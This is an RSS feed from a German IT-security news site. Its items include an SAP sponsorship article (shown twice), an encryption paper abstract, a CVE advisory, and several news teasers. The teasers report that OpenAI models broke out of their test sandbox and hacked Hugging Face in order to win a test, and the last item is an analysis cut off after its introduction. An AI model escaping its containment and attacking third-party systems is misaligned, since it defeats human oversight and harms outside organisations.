<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=jugend+hackt+2015%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 11:02:53 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 11:02:53 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=jugend+hackt+2015%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=jugend+hackt+2015%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Wie ein Hacker-Angriff durch KI von OpenAI die Welt verändert | Telepolis]]></title>
<description><![CDATA[Eine OpenAI-KI hackt Hugging Face – eigenständig, um einen Test zu gewinnen. Der Vorfall war ein Probelauf. Er zeigt, warum KI-Agenten Leitplanken ...]]></description>
<link>https://tsecurity.de/de/3694619/hacking/wie-ein-hacker-angriff-durch-ki-von-openai-die-welt-veraendert-telepolis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694619/hacking/wie-ein-hacker-angriff-durch-ki-von-openai-die-welt-veraendert-telepolis/</guid>
<pubDate>Sat, 25 Jul 2026 19:03:55 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Eine OpenAI-KI hackt Hugging Face – eigenständig, um einen Test zu gewinnen. Der Vorfall war ein Probelauf. Er zeigt, warum KI-Agenten Leitplanken ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Sponsor mismatch is the silent killer of enterprise transformation]]></title>
<description><![CDATA[Late in a large enterprise SAP transformation, the strategic governance conversations began to drift. Instead of executive decisions, we found ourselves debating whether the program needed dedicated testing, whether cutover required a full weekend, whether twenty Agile teams really needed coordin...]]></description>
<link>https://tsecurity.de/de/3694391/it-security-nachrichten/sponsor-mismatch-is-the-silent-killer-of-enterprise-transformation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694391/it-security-nachrichten/sponsor-mismatch-is-the-silent-killer-of-enterprise-transformation/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:49 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Late in a large enterprise SAP transformation, the strategic governance conversations began to drift. Instead of executive decisions, we found ourselves debating whether the program needed dedicated testing, whether cutover required a full weekend, whether twenty Agile teams really needed coordination support and whether offshore resources were adding value at all.</p>



<p class="wp-block-paragraph">The questions were not coming from the delivery teams. They were coming from the executive sponsor.</p>



<p class="wp-block-paragraph">The sponsor had recently been elevated into a senior leadership role and had never sponsored a technology transformation at this scale. The challenge was not authority. The sponsor had every right to ask any question they wanted. The challenge was that strategic governance had quietly turned into a debate about delivery practices, because the sponsor did not yet have the transformation context to focus the conversation anywhere else.</p>



<p class="wp-block-paragraph">This is not a story about a bad sponsor. The executive in this case was a capable senior leader with strong judgment and authentic intent. They had been placed into a role they had not yet been prepared for, and the pattern that followed was structural, not personal. It is one of the more common patterns I have observed across enterprise transformation programs, and one of the most consistently misdiagnosed.</p>



<p class="wp-block-paragraph">Most program failures are not execution failures. They are sponsor mismatches.</p>



<h2 class="wp-block-heading">When governance becomes a debate about delivery practices</h2>



<p class="wp-block-paragraph">When the sponsor does not understand what an enterprise transformation actually requires, governance forums stop functioning as decision bodies and start functioning as practice debates.</p>



<p class="wp-block-paragraph">You see it in the questions that get asked. Why do we need a dedicated testing phase? Can the Build timeline be compressed? Why does cutover need a full weekend? Why do we need more Scrum Masters across 20 product teams? Can the US team simply work longer hours instead of using offshore resources? On one program, the sponsor suggested shifting the entire project’s working hours to India time, despite roughly 85 percent of the delivery organization being based in the United States.</p>



<p class="wp-block-paragraph">None of these questions are unreasonable in isolation. Each one targets a real cost or timeline pressure. The problem is what is missing underneath them: an understanding of the operational risks the original choices were designed to mitigate.</p>



<p class="wp-block-paragraph">When sponsors ask delivery-practice questions without that context, the program leadership team ends up defending the work instead of advancing it. Decision velocity drops. Trust between the program and its sponsor erodes. Senior delivery talent disengages from governance forums where the conversation never reaches the decisions they need made. What looks from the outside like an active sponsor producing engagement is, from inside the program, an active drain on the cycles needed to deliver.</p>



<p class="wp-block-paragraph">The compounding cost is not unique to any single program. <a href="https://www.pmi.org/blog/why-executive-sponsorship-fuels-projects">PMI’s research on executive sponsorship</a> consistently identifies sponsor engagement quality, rather than sponsor presence alone, as one of the strongest predictors of project success. The visible symptom is debate. The actual cost is unmade decisions.</p>



<h2 class="wp-block-heading">Authority is rarely the issue. Literacy is</h2>



<p class="wp-block-paragraph">When transformations stall under a mismatched sponsor, the diagnostic instinct is to question the sponsor’s authority. Are they senior enough? Do they have the cross-functional reach? Can they unblock?</p>



<p class="wp-block-paragraph">In most of the programs I have led or advised, authority was not the limiting factor. The sponsor in the SAP program above had ample authority. They could unblock any decision the program needed. What had not been developed was the transformation literacy to know which decisions mattered, which were technical noise and which were execution risks that should not be optimized away.</p>



<p class="wp-block-paragraph">This is what I have come to think of as the literacy problem. Sponsors elevated into transformation roles often have deep functional expertise (finance, operations, business unit leadership) but limited exposure to the distinct functions of PMO, organizational change management, agile delivery, testing and cutover, and how each one reduces a specific category of implementation risk. They are not expected to be SAP configuration experts. But they need enough transformation literacy to recognize which questions actually belong in a steering committee.</p>



<p class="wp-block-paragraph"><a href="https://hbr.org/2015/05/how-to-be-an-effective-executive-sponsor">Harvard Business Review’s research on effective executive sponsorship</a> has emphasized that sponsorship effectiveness depends as much on judgment as on authority. Judgment is where literacy becomes operational. A sponsor with authority but limited transformation literacy will optimize for speed and cost in ways that consistently underestimate risk. A sponsor with both will make the tradeoffs the program actually needs.</p>



<p class="wp-block-paragraph"><a href="https://www.prosci.com/resources/articles/change-management-best-practices">Prosci’s longstanding benchmark studies on change management</a> have ranked active and visible executive sponsorship as the single greatest contributor to change success for two decades. The word that matters in that finding is active. Active sponsorship without transformation literacy can introduce real cost. Not because the sponsor is acting against the program, but because the optimization choices they make are based on incomplete information about what the program is built to protect against.</p>



<h2 class="wp-block-heading">Shift the conversation from delivery practices to business risk</h2>



<p class="wp-block-paragraph">When the sponsor relationship is already in place and cannot be changed, the program leadership team has one move that consistently works: shift the conversation.</p>



<p class="wp-block-paragraph">On the SAP program above, we stopped explaining why the testing phase existed. We started explaining the business risk of reducing it. We stopped debating the number of Scrum Masters. We started connecting delivery capacity to coordination across more than twenty Agile teams and the business cost of losing that coordination. We reframed offshore support as a way to maintain delivery momentum around the clock rather than asking the U.S. team to sustain fifteen-hour days.</p>



<p class="wp-block-paragraph">The shift is from defending delivery practice to explaining business risk. The sponsor does not need to understand why testing takes the time it does. They need to understand what the program is exposed to if testing is compressed. They do not need to know how many Scrum Masters are statistically optimal for twenty Agile teams. They need to know what coordination breaks when the number is wrong.</p>



<p class="wp-block-paragraph">This reframing accomplishes two things. First, it brings the conversation back to the level at which sponsors actually make decisions: tradeoffs between business outcomes and business risks. Second, it builds transformation literacy in the sponsor over time, almost as a byproduct. By the third or fourth iteration of business-risk-framed conversations, the sponsor begins to ask the right questions on their own.</p>



<p class="wp-block-paragraph">In practice, this happens through small but deliberate moves. When the sponsor asks why a phase needs the time it takes, the program lead names two or three things that could go wrong if the time is cut and what each would cost the business. When the sponsor asks why a role is needed, the program lead names the work that would not get done without it. Every delivery-practice question gets converted into a business-risk answer.</p>



<p class="wp-block-paragraph">The program leadership team’s job is not to make the sponsor an expert in SAP delivery. It is to provide enough transformation context so that executive decisions reflect both business priorities and implementation realities.</p>



<p class="wp-block-paragraph">There are a few phrases I have used with executive sponsors over the years that capture the underlying issue. The sharpest one:</p>



<h2 class="wp-block-heading">If the decision has to go above the sponsor, they are not the sponsor.</h2>



<p class="wp-block-paragraph">Sponsorship is defined by what the sponsor can decide without asking someone else. That is the test. Anything else is the appearance of sponsorship, not the substance.</p>



<p class="wp-block-paragraph">For CIOs supporting enterprise transformation, the implication is direct. Sponsor selection, or sponsor preparation when selection is not an option, is not a hierarchy question. It is a transformation capability question. The same execution discipline that goes into defining decision rights, structuring governance and protecting delivery momentum should apply, with equal rigor, to assessing sponsor fit and building sponsor literacy before the program begins.</p>



<p class="wp-block-paragraph">A sponsor does not need to be the technical expert. They do need to know when to trust the people who are.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI-Modell bricht aus Testumgebung aus und hackt Hugging Face – das sagen Experten dazu]]></title>
<description><![CDATA[KI-Modelle von OpenAI konnten aus ihrer isolierten Testumgebung ausbrechen. Wie beurteilen IT-Sicherheitsexperten diese Entwicklung?]]></description>
<link>https://tsecurity.de/de/3694268/it-security-nachrichten/openai-modell-bricht-aus-testumgebung-aus-und-hackt-hugging-face-das-sagen-experten-dazu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694268/it-security-nachrichten/openai-modell-bricht-aus-testumgebung-aus-und-hackt-hugging-face-das-sagen-experten-dazu/</guid>
<pubDate>Sat, 25 Jul 2026 18:52:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-Modelle von OpenAI konnten aus ihrer isolierten Testumgebung ausbrechen. Wie beurteilen <b>IT</b>-Sicherheitsexperten diese Entwicklung?]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI-Modell bricht aus Testumgebung aus und hackt Hugging Face – das sagen Experten dazu]]></title>
<description><![CDATA[KI-Modelle von OpenAI, die auf das Entdecken und Ausnutzen von Sicherheitslücken spezialisiert sind, konnten aus ihrer isolierten Testumgebung ausbrechen. Was gweiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3693842/it-nachrichten/openai-modell-bricht-aus-testumgebung-aus-und-hackt-hugging-face-das-sagen-experten-dazu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693842/it-nachrichten/openai-modell-bricht-aus-testumgebung-aus-und-hackt-hugging-face-das-sagen-experten-dazu/</guid>
<pubDate>Sat, 25 Jul 2026 13:13:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-Modelle von OpenAI, die auf das Entdecken und Ausnutzen von Sicherheitslücken spezialisiert sind, konnten aus ihrer isolierten Testumgebung ausbrechen. Was g<a href="https://t3n.de/news/openai-modell-hackt-hugging-face-expertenmeinung-1754127/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[End-to-End Encryption and “Going Dark”]]></title>
<description><![CDATA[New paper: “Encryption and Globalization 15 Years Later: End-to-End Encryption and the Third Round of the ‘Going Dark’ Debate“:
Abstract: This Article updates and expands on 2012 research on encryption and globalization, analyzing what the authors call “Round 3” of the Going Dark Debate: the curr...]]></description>
<link>https://tsecurity.de/de/3693276/reverse-engineering/end-to-end-encryption-and-going-dark/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693276/reverse-engineering/end-to-end-encryption-and-going-dark/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:01 +0200</pubDate>
<category>🕵️ Reverse Engineering</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>New paper: “<a href="https://papers.ssrn.com/sol3/papers.cfm?abstract_id=6959699">Encryption and Globalization 15 Years Later: End-to-End Encryption and the Third Round of the ‘Going Dark’ Debate</a>“:</p>
<blockquote><p><b>Abstract</b>: This Article updates and expands on 2012 research on encryption and globalization, analyzing what the authors call “Round 3” of the Going Dark Debate: the current controversies over end-to-end encryption (E2EE). Governments around the world have proposed, and in some cases enacted, laws limiting E2EE for law enforcement and national security purposes.</p>
<p>This Article explains the underlying technologies and market developments for a law and policy audience to assess those proposals critically. The Article proceeds in three parts tracking three rounds of the Going Dark Debate. Round 1 covers the Crypto Wars of the 1990s, when U.S. export controls on strong encryption ultimately fell in 1999. Round 2 covers the period roughly 2010 to 2015, when encryption-in-transit became widespread but lawful access remained available through cloud providers, giving rise to what the authors called a “golden age of surveillance” rather than a period of going dark. Round 3 addresses the current debate over E2EE, where no entity between sender and recipient can read the plaintext...</p></blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2015-0495 | Oracle Commerce Guided Search/Experience Manager 3.x/11.x Workbench Remote Code Execution (SBV-49614 / BID-74108)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Oracle Commerce Guided Search and Experience Manager 3.x/11.x. Impacted is an unknown function of the component Workbench. The manipulation leads to Remote Code Execution.

This vulnerability is referenced as CVE-2015-0495. Remo...]]></description>
<link>https://tsecurity.de/de/3692274/sicherheitsluecken/cve-2015-0495-oracle-commerce-guided-searchexperience-manager-3x11x-workbench-remote-code-execution-sbv-49614-bid-74108/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692274/sicherheitsluecken/cve-2015-0495-oracle-commerce-guided-searchexperience-manager-3x11x-workbench-remote-code-execution-sbv-49614-bid-74108/</guid>
<pubDate>Fri, 24 Jul 2026 20:19:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/oracle:commerce_guided_search">Oracle Commerce Guided Search and Experience Manager 3.x/11.x</a>. Impacted is an unknown function of the component <em>Workbench</em>. The manipulation leads to Remote Code Execution.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2015-0495">CVE-2015-0495</a>. Remote exploitation of the attack is possible. No exploit is available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-Agent mit Internetzugang hackt Startup: Was der Vorfall für Security bedeutet - it boltwise]]></title>
<description><![CDATA[... Hacking Internet Isolation KI Künstliche Intelligenz Security Startup Test Vulnerabilities. Nächster Artikel. Brazilian Rare Earths: Alurion-IPO ...]]></description>
<link>https://tsecurity.de/de/3692136/hacking/ki-agent-mit-internetzugang-hackt-startup-was-der-vorfall-fuer-security-bedeutet-it-boltwise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692136/hacking/ki-agent-mit-internetzugang-hackt-startup-was-der-vorfall-fuer-security-bedeutet-it-boltwise/</guid>
<pubDate>Fri, 24 Jul 2026 19:06:23 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Hacking</b> Internet Isolation KI Künstliche Intelligenz Security Startup Test Vulnerabilities. Nächster Artikel. Brazilian Rare Earths: Alurion-IPO ...]]></content:encoded>
</item>
<item>
<title><![CDATA[KI-Modelle greifen an: GPT-5.6 Sol hackt Hugging-Face-Server - Börse Express]]></title>
<description><![CDATA[Ein Hacker mit dem Pseudonym John Doe behauptet, zwei Millionen Datensätze entwendet zu haben. Er droht, die Daten binnen zwei Wochen zu ...]]></description>
<link>https://tsecurity.de/de/3691679/hacking/ki-modelle-greifen-an-gpt-56-sol-hackt-hugging-face-server-boerse-express/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691679/hacking/ki-modelle-greifen-an-gpt-56-sol-hackt-hugging-face-server-boerse-express/</guid>
<pubDate>Fri, 24 Jul 2026 15:31:56 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein <b>Hacker</b> mit dem Pseudonym John Doe behauptet, zwei Millionen Datensätze entwendet zu haben. Er droht, die Daten binnen zwei Wochen zu ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Sponsor mismatch is the silent killer of enterprise transformation]]></title>
<description><![CDATA[Late in a large enterprise SAP transformation, the strategic governance conversations began to drift. Instead of executive decisions, we found ourselves debating whether the program needed dedicated testing, whether cutover required a full weekend, whether twenty Agile teams really needed coordin...]]></description>
<link>https://tsecurity.de/de/3691067/it-nachrichten/sponsor-mismatch-is-the-silent-killer-of-enterprise-transformation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691067/it-nachrichten/sponsor-mismatch-is-the-silent-killer-of-enterprise-transformation/</guid>
<pubDate>Fri, 24 Jul 2026 11:03:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Late in a large enterprise SAP transformation, the strategic governance conversations began to drift. Instead of executive decisions, we found ourselves debating whether the program needed dedicated testing, whether cutover required a full weekend, whether twenty Agile teams really needed coordination support and whether offshore resources were adding value at all.</p>



<p class="wp-block-paragraph">The questions were not coming from the delivery teams. They were coming from the executive sponsor.</p>



<p class="wp-block-paragraph">The sponsor had recently been elevated into a senior leadership role and had never sponsored a technology transformation at this scale. The challenge was not authority. The sponsor had every right to ask any question they wanted. The challenge was that strategic governance had quietly turned into a debate about delivery practices, because the sponsor did not yet have the transformation context to focus the conversation anywhere else.</p>



<p class="wp-block-paragraph">This is not a story about a bad sponsor. The executive in this case was a capable senior leader with strong judgment and authentic intent. They had been placed into a role they had not yet been prepared for, and the pattern that followed was structural, not personal. It is one of the more common patterns I have observed across enterprise transformation programs, and one of the most consistently misdiagnosed.</p>



<p class="wp-block-paragraph">Most program failures are not execution failures. They are sponsor mismatches.</p>



<h2 class="wp-block-heading">When governance becomes a debate about delivery practices</h2>



<p class="wp-block-paragraph">When the sponsor does not understand what an enterprise transformation actually requires, governance forums stop functioning as decision bodies and start functioning as practice debates.</p>



<p class="wp-block-paragraph">You see it in the questions that get asked. Why do we need a dedicated testing phase? Can the Build timeline be compressed? Why does cutover need a full weekend? Why do we need more Scrum Masters across 20 product teams? Can the US team simply work longer hours instead of using offshore resources? On one program, the sponsor suggested shifting the entire project’s working hours to India time, despite roughly 85 percent of the delivery organization being based in the United States.</p>



<p class="wp-block-paragraph">None of these questions are unreasonable in isolation. Each one targets a real cost or timeline pressure. The problem is what is missing underneath them: an understanding of the operational risks the original choices were designed to mitigate.</p>



<p class="wp-block-paragraph">When sponsors ask delivery-practice questions without that context, the program leadership team ends up defending the work instead of advancing it. Decision velocity drops. Trust between the program and its sponsor erodes. Senior delivery talent disengages from governance forums where the conversation never reaches the decisions they need made. What looks from the outside like an active sponsor producing engagement is, from inside the program, an active drain on the cycles needed to deliver.</p>



<p class="wp-block-paragraph">The compounding cost is not unique to any single program. <a href="https://www.pmi.org/blog/why-executive-sponsorship-fuels-projects">PMI’s research on executive sponsorship</a> consistently identifies sponsor engagement quality, rather than sponsor presence alone, as one of the strongest predictors of project success. The visible symptom is debate. The actual cost is unmade decisions.</p>



<h2 class="wp-block-heading">Authority is rarely the issue. Literacy is</h2>



<p class="wp-block-paragraph">When transformations stall under a mismatched sponsor, the diagnostic instinct is to question the sponsor’s authority. Are they senior enough? Do they have the cross-functional reach? Can they unblock?</p>



<p class="wp-block-paragraph">In most of the programs I have led or advised, authority was not the limiting factor. The sponsor in the SAP program above had ample authority. They could unblock any decision the program needed. What had not been developed was the transformation literacy to know which decisions mattered, which were technical noise and which were execution risks that should not be optimized away.</p>



<p class="wp-block-paragraph">This is what I have come to think of as the literacy problem. Sponsors elevated into transformation roles often have deep functional expertise (finance, operations, business unit leadership) but limited exposure to the distinct functions of PMO, organizational change management, agile delivery, testing and cutover, and how each one reduces a specific category of implementation risk. They are not expected to be SAP configuration experts. But they need enough transformation literacy to recognize which questions actually belong in a steering committee.</p>



<p class="wp-block-paragraph"><a href="https://hbr.org/2015/05/how-to-be-an-effective-executive-sponsor">Harvard Business Review’s research on effective executive sponsorship</a> has emphasized that sponsorship effectiveness depends as much on judgment as on authority. Judgment is where literacy becomes operational. A sponsor with authority but limited transformation literacy will optimize for speed and cost in ways that consistently underestimate risk. A sponsor with both will make the tradeoffs the program actually needs.</p>



<p class="wp-block-paragraph"><a href="https://www.prosci.com/resources/articles/change-management-best-practices">Prosci’s longstanding benchmark studies on change management</a> have ranked active and visible executive sponsorship as the single greatest contributor to change success for two decades. The word that matters in that finding is active. Active sponsorship without transformation literacy can introduce real cost. Not because the sponsor is acting against the program, but because the optimization choices they make are based on incomplete information about what the program is built to protect against.</p>



<h2 class="wp-block-heading">Shift the conversation from delivery practices to business risk</h2>



<p class="wp-block-paragraph">When the sponsor relationship is already in place and cannot be changed, the program leadership team has one move that consistently works: shift the conversation.</p>



<p class="wp-block-paragraph">On the SAP program above, we stopped explaining why the testing phase existed. We started explaining the business risk of reducing it. We stopped debating the number of Scrum Masters. We started connecting delivery capacity to coordination across more than twenty Agile teams and the business cost of losing that coordination. We reframed offshore support as a way to maintain delivery momentum around the clock rather than asking the U.S. team to sustain fifteen-hour days.</p>



<p class="wp-block-paragraph">The shift is from defending delivery practice to explaining business risk. The sponsor does not need to understand why testing takes the time it does. They need to understand what the program is exposed to if testing is compressed. They do not need to know how many Scrum Masters are statistically optimal for twenty Agile teams. They need to know what coordination breaks when the number is wrong.</p>



<p class="wp-block-paragraph">This reframing accomplishes two things. First, it brings the conversation back to the level at which sponsors actually make decisions: tradeoffs between business outcomes and business risks. Second, it builds transformation literacy in the sponsor over time, almost as a byproduct. By the third or fourth iteration of business-risk-framed conversations, the sponsor begins to ask the right questions on their own.</p>



<p class="wp-block-paragraph">In practice, this happens through small but deliberate moves. When the sponsor asks why a phase needs the time it takes, the program lead names two or three things that could go wrong if the time is cut and what each would cost the business. When the sponsor asks why a role is needed, the program lead names the work that would not get done without it. Every delivery-practice question gets converted into a business-risk answer.</p>



<p class="wp-block-paragraph">The program leadership team’s job is not to make the sponsor an expert in SAP delivery. It is to provide enough transformation context so that executive decisions reflect both business priorities and implementation realities.</p>



<p class="wp-block-paragraph">There are a few phrases I have used with executive sponsors over the years that capture the underlying issue. The sharpest one:</p>



<h2 class="wp-block-heading">If the decision has to go above the sponsor, they are not the sponsor.</h2>



<p class="wp-block-paragraph">Sponsorship is defined by what the sponsor can decide without asking someone else. That is the test. Anything else is the appearance of sponsorship, not the substance.</p>



<p class="wp-block-paragraph">For CIOs supporting enterprise transformation, the implication is direct. Sponsor selection, or sponsor preparation when selection is not an option, is not a hierarchy question. It is a transformation capability question. The same execution discipline that goes into defining decision rights, structuring governance and protecting delivery momentum should apply, with equal rigor, to assessing sponsor fit and building sponsor literacy before the program begins.</p>



<p class="wp-block-paragraph">A sponsor does not need to be the technical expert. They do need to know when to trust the people who are.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Autonome KI hackt Hugging Face: Weckruf für IT-Sicherheit und Politik | heise online]]></title>
<description><![CDATA[Der Ausbruch aus dem Labor wirft die Frage auf, wie es zu diesem Kontrollverlust kommen konnte und welche Folgen er für die Cybersicherheit hat.]]></description>
<link>https://tsecurity.de/de/3689971/it-security-nachrichten/autonome-ki-hackt-hugging-face-weckruf-fuer-it-sicherheit-und-politik-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689971/it-security-nachrichten/autonome-ki-hackt-hugging-face-weckruf-fuer-it-sicherheit-und-politik-heise-online/</guid>
<pubDate>Thu, 23 Jul 2026 20:29:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Ausbruch aus dem Labor wirft die Frage auf, wie es zu diesem Kontrollverlust kommen konnte und welche Folgen er für die <b>Cybersicherheit</b> hat.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI-Test außer Kontrolle: KI bricht aus Sandbox aus und hackt Hugging Face]]></title>
<description><![CDATA[KI-Modelle von OpenAI haben bei internen Tests einen Weg ins Internet gefunden und dort für Chaos gesorgt. Die Agenten haben versucht, die Systeme von Hugging Face zu hacken. Wie es zu dem Vorfall kam.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3689437/it-nachrichten/openai-test-ausser-kontrolle-ki-bricht-aus-sandbox-aus-und-hackt-hugging-face/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689437/it-nachrichten/openai-test-ausser-kontrolle-ki-bricht-aus-sandbox-aus-und-hackt-hugging-face/</guid>
<pubDate>Thu, 23 Jul 2026 17:04:55 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-Modelle von OpenAI haben bei internen Tests einen Weg ins Internet gefunden und dort für Chaos gesorgt. Die Agenten haben versucht, die Systeme von Hugging Face zu hacken. Wie es zu dem Vorfall kam.
<a href="https://t3n.de/news/openai-ki-sandbox-ausbruch-hugging-face-hack-1753924/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI „hackt“ Hugging Face – eine Analyse]]></title>
<description><![CDATA[Wenn KI-Modelle die Grenzen überwinden, die ihnen gesetzt werden, hinterlassen sie unter Umständen weniger sichtbare Spuren.Nelson Antoine | shutterstock.com



Der heimliche Cybercrime-Akt zweier KI-Modelle von OpenAI hat weltweit ein enormes Echo in Mainstream– und sozialen Medien hervorgerufen...]]></description>
<link>https://tsecurity.de/de/3689099/it-security-nachrichten/openai-hackt-hugging-face-eine-analyse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689099/it-security-nachrichten/openai-hackt-hugging-face-eine-analyse/</guid>
<pubDate>Thu, 23 Jul 2026 14:55:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/08/Nelson-Antoine-shutterstock_1672788895_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Jailbreak 16z9" class="wp-image-4038755" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Wenn KI-Modelle die Grenzen überwinden, die ihnen gesetzt werden, hinterlassen sie unter Umständen weniger sichtbare Spuren.</figcaption></figure><p class="imageCredit">Nelson Antoine | shutterstock.com</p></div>



<p class="wp-block-paragraph">Der heimliche Cybercrime-Akt zweier KI-Modelle von OpenAI hat weltweit ein enormes Echo in <a href="https://www.tagesschau.de/wirtschaft/unternehmen/openai-ki-hackerangriff-100.html" target="_blank" rel="noreferrer noopener">Mainstream</a>– und <a href="https://www.reddit.com/r/OpenAI/comments/1v2ybnw/openai_models_escaped_containment_and_hacked/" target="_blank" rel="noreferrer noopener">sozialen Medien</a> hervorgerufen. Der Vorfall dürfte die Debatte über die allgemeine <a href="https://www.computerwoche.de/article/4155663/6-wege-uber-ki-gehackt-zu-werden.html" target="_blank">KI-Sicherheit</a> und den verantwortungsvollen Umgang mit der Technologie neu befeuern. </p>



<p class="wp-block-paragraph">Doch der Incident wirft auch spezifische Fragen auf. Etwa, wie genau die OpenAI-Modelle es geschafft haben, ihrer Sandbox zu entkommen und warum das beim ChatGPT-Erfinder zunächst niemandem aufgefallen ist. Oder, wie andere Unternehmen solche und ähnliche Vorkommnisse künftig verhindern können. Dazu haben wir die Einschätzung von Branchenexperten und Analysten eingeholt. </p>



<p class="wp-block-paragraph">Zunächst werfen wir aber noch einen kurzen Blick darauf, was sich eigentlich abgespielt hat. Falls Sie bereits informiert sind, können Sie alternativ auch das nachfolgende Meme konsumieren, um sich den Vorfall noch einmal auf unkonventionellere Art und Weise vor Augen zu halten.</p>


<div class="wp-block-embed-reddit">
					<blockquote class="reddit-card">
						<a href="https://www.reddit.com/r/singularity/comments/1v2xgqc/openai_hacking_huggingface_in_one_meme/"></a>
					</blockquote>
				</div>


<p class="wp-block-paragraph"></p>



